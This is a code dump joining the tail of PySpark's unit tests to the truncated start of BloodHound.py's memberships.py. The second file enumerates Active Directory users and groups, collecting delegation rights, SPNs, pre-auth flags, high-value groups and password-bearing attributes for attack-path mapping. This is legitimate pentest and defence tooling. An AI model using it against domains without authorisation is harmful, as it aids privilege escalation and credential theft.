"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_set_conf(self):
# This is for an internal use case. When there is an existing SparkContext,
# SparkSession's builder needs to set configs into SparkContext's conf.
sc = SparkContext()
sc._conf.set("spark.test.SPARK16224", "SPARK16224")
self.assertEqual(sc._jsc.sc().conf().get("spark.test.SPARK16224"), "SPARK16224")
sc.stop()
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
memberships.py | ####################
#
# Copyright (c) 2018 Fox-IT
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
####################
import logging
import queue
import threading
import calendar
from bloodhound.ad.utils import ADUtils, AceResolver
from bloodhound.ad.computer import ADComputer
from bloodhound.ad.structures import LDAP_SID
from bloodhound.enumeration.acls import AclEnumerator, parse_binary_acl
from bloodhound.enumeration.outputworker import OutputWorker
class MembershipEnumerator(object):
"""
Class to enumerate memberships in the domain.
Contains the dumping functions which
methods from the bloodhound.ad module.
"""
def __init__(self, addomain, addc, collect, disable_pooling):
"""
Membership enumeration. Enumerates all groups/users/other memberships.
"""
self.addomain = addomain
self.addc = addc
# Store collection methods specified
self.collect = collect
self.disable_pooling = disable_pooling
self.aclenumerator = AclEnumerator(addomain, addc, collect)
self.aceresolver = AceResolver(addomain, addomain.objectresolver)
self.result_q = None
def get_membership(self, member):
"""
Attempt to resolve the membership (DN) of a group to an object
"""
# First assume it is a user
try:
resolved_entry = self.addomain.users[member]
except KeyError:
# Try if it is a group
try:
resolved_entry = self.addomain.groups[member]
except KeyError:
# Try if it is a computer
try:
entry = self.addomain.computers[member]
# Computers are stored as raw entries
resolved_entry = ADUtils.resolve_ad_entry(entry)
except KeyError:
use_gc = ADUtils.ldap2domain(member) != self.addomain.domain
qobject = self.addomain.objectresolver.resolve_distinguishedname(member, use_gc=use_gc)
if qobject is None:
return None
resolved_entry = ADUtils.resolve_ad_entry(qobject)
# Store it in the cache
if resolved_entry['type'] == 'User':
self.addomain.users[member] = resolved_entry
if resolved_entry['type'] == 'Group':
self.addomain.groups[member] = resolved_entry
# Computers are stored as raw entries
if resolved_entry['type'] == 'Computer':
self.addomain.computers[member] = qobject
return {
"ObjectIdentifier": resolved_entry['objectid'],
"ObjectType": resolved_entry['type'].capitalize()
}
@staticmethod
def get_primary_membership(entry):
"""
Construct primary membership from RID to SID (BloodHound 3.0 only)
"""
try:
primarygroupid = int(entry['attributes']['primaryGroupID'])
except (TypeError, KeyError):
# Doesn't have a primarygroupid, means it is probably a Group instead of a user
return None
return '%s-%d' % ('-'.join(entry['attributes']['objectSid'].split('-')[:-1]), primarygroupid)
@staticmethod
def add_user_properties(user, entry):
"""
Resolve properties for user objects
"""
props = user['Properties']
# print entry
# Is user enabled? Checked by seeing if the UAC flag 2 (ACCOUNT_DISABLED) is not set
props['enabled'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 2 == 0
props['lastlogon'] = ADUtils.win_timestamp_to_unix(
ADUtils.get_entry_property(entry, 'lastLogon', default=0, raw=True)
)
props['lastlogontimestamp'] = ADUtils.win_timestamp_to_unix(
ADUtils.get_entry_property(entry, 'lastlogontimestamp', default=0, raw=True)
)
if props['lastlogontimestamp'] == 0:
props['lastlogontimestamp'] = -1
props['pwdlastset'] = ADUtils.win_timestamp_to_unix(
ADUtils.get_entry_property(entry, 'pwdLastSet', default=0, raw=True)
)
props['dontreqpreauth'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00400000 == 0x00400000
props['pwdneverexpires'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00010000 == 0x00010000
props['sensitive'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00100000 == 0x00100000
props['serviceprincipalnames'] = ADUtils.get_entry_property(entry, 'servicePrincipalName', [])
props['hasspn'] = len(props['serviceprincipalnames']) > 0
props['displayname'] = ADUtils.get_entry_property(entry, 'displayName')
props['email'] = ADUtils.get_entry_property(entry, 'mail')
props['title'] = ADUtils.get_entry_property(entry, 'title')
props['homedirectory'] = ADUtils.get_entry_property(entry, 'homeDirectory')
props['description'] = ADUtils.get_entry_property(entry, 'description')
props['userpassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'userPassword'))
props['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', 0) == 1
if len(ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', [])) > 0:
props['allowedtodelegate'] = ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', [])
props['sidhistory'] = [LDAP_SID(bsid).formatCanonical() for bsid in ADUtils.get_entry_property(entry, 'sIDHistory', [])]
# v4 props
whencreated = ADUtils.get_entry_property(entry, 'whencreated', default=0)
if isinstance(whencreated, int):
props['whencreated'] = whencreated
else:
props['whencreated'] = calendar.timegm(whencreated.timetuple())
props['unixpassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'unixuserpassword'))
props['unicodepassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'unicodepwd'))
# Non-default schema?
# props['sfupassword'] = ADUtils.ensure_string(ADUtils.get_entry_property(entry, 'msSFU30Password'))
props['sfupassword'] = None
def enumerate_users(self, timestamp=""):
filename = timestamp + 'users.json'
# Should we include extra properties in the query?
with_properties = 'objectprops' in self.collect
acl = 'acl' in self.collect
entries = self.addc.get_users(include_properties=with_properties, acl=acl)
logging.debug('Writing users to file: %s', filename)
# Use a separate queue for processing the results
self.result_q = queue.Queue()
results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'users', filename))
results_worker.daemon = True
results_worker.start()
if acl and not self.disable_pooling:
self.aclenumerator.init_pool()
# This loops over a generator, results are fetched from LDAP on the go
for entry in entries:
resolved_entry = ADUtils.resolve_ad_entry(entry)
# Skip trust objects
if resolved_entry['type'] == 'trustaccount':
continue
user = {
"AllowedToDelegate": [],
"ObjectIdentifier": ADUtils.get_entry_property(entry, 'objectSid'),
"PrimaryGroupSID": MembershipEnumerator.get_primary_membership(entry),
"Properties": {
"name": resolved_entry['principal'],
"domain": self.addomain.domain.upper(),
"domainsid": self.addomain.domain_object.sid,
"distinguishedname":ADUtils.get_entry_property(entry, 'distinguishedName').upper(),
"unconstraineddelegation": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00080000 == 0x00080000,
"trustedtoauth": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x01000000 == 0x01000000,
"passwordnotreqd": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00000020 == 0x00000020
},
"Aces": [],
"SPNTargets": [],
"HasSIDHistory": [],
"IsDeleted": ADUtils.get_entry_property(entry, 'isDeleted', default=False)
}
if with_properties:
MembershipEnumerator.add_user_properties(user, entry)
if 'allowedtodelegate' in user['Properties']:
for host in user['Properties']['allowedtodelegate']:
try:
target = host.split('/')[1]
except IndexError:
logging.warning('Invalid delegation target: %s', host)
continue
try:
sid = self.addomain.computersidcache.get(target.lower())
user['AllowedToDelegate'].append(sid)
except KeyError:
if '.' in target:
user['AllowedToDelegate'].append(target.upper())
# Parse SID history
if len(user['Properties']['sidhistory']) > 0:
for historysid in user['Properties']['sidhistory']:
user['HasSIDHistory'].append(self.aceresolver.resolve_sid(historysid))
# If this is a GMSA, process it's ACL. We don't bother with threads/processes here
# since these accounts shouldn't be that common and neither should they have very complex
# DACLs which control who can read their password
if ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', default=b'', raw=True) != b'':
self.parse_gmsa(user, entry)
self.addomain.users[entry['dn']] = resolved_entry
# If we are enumerating ACLs, we break out of the loop here
# this is because parsing ACLs is computationally heavy and therefor is done in subprocesses
if acl:
if self.disable_pooling:
# Debug mode, don't run this pooled since it hides exceptions
self.process_acldata(parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map))
else:
# Process ACLs in separate processes, then call the processing function to resolve entries and write them to file
self.aclenumerator.pool.apply_async(parse_binary_acl, args=(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata)
else:
# Write it to the queue -> write to file in separate thread
# this is solely for consistency with acl parsing, the performance improvement is probably minimal
self.result_q.put(user)
self.write_default_users()
# If we are parsing ACLs, close the parsing pool first
# then close the result queue and join it
if acl and not self.disable_pooling:
self.aclenumerator.pool.close()
self.aclenumerator.pool.join()
self.result_q.put(None)
else:
self.result_q.put(None)
self.result_q.join()
logging.debug('Finished writing users')
def enumerate_groups(self, timestamp=""):
highvalue = ["S-1-5-32-544", "S-1-5-32-550", "S-1-5-32-549", "S-1-5-32-551", "S-1-5-32-548"]
def is_highvalue(sid):
if sid.endswith("-512") or sid.endswith("-516") or sid.endswith("-519") or sid.endswith("-520"):
return True
if sid in highvalue:
return True
return False
# Should we include extra properties in the query?
with_properties = 'objectprops' in self.collect
acl = 'acl' in self.collect
filename = timestamp + 'groups.json'
entries = self.addc.get_groups(include_properties=with_properties, acl=acl)
logging.debug('Writing groups to file: %s', filename)
# Use a separate queue for processing the results
self.result_q = queue.Queue()
results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'groups', filename))
results_worker.daemon = True
results_worker.start()
if acl and not self.disable_pooling:
self.aclenumerator.init_pool()
for entry in entries:
resolved_entry = ADUtils.resolve_ad_entry(entry)
self.addomain.groups[entry['dn']] = resolved_entry
try:
sid = entry['attributes']['objectSid']
except KeyError:
#Somehow we found a group without a sid?
logging.warning('Could not determine SID for group %s', entry['attributes']['distinguishedName'])
continue
group = {
"ObjectIdentifier": sid,
"Properties": {
"domain": self.addomain.domain.upper(),
"domainsid": self.addomain.domain_object.sid,
"name": resolved_entry['principal'],
"distinguishedname": ADUtils.get_entry_property(entry, 'distinguishedName').upper()
},
"Members": [],
"Aces": [],
"IsDeleted": ADUtils.get_entry_property(entry, 'isDeleted', default=False)
}
if sid in ADUtils.WELLKNOWN_SIDS:
# Prefix it with the domain
group['ObjectIdentifier'] = '%s-%s' % (self.addomain.domain.upper(), sid)
if with_properties:
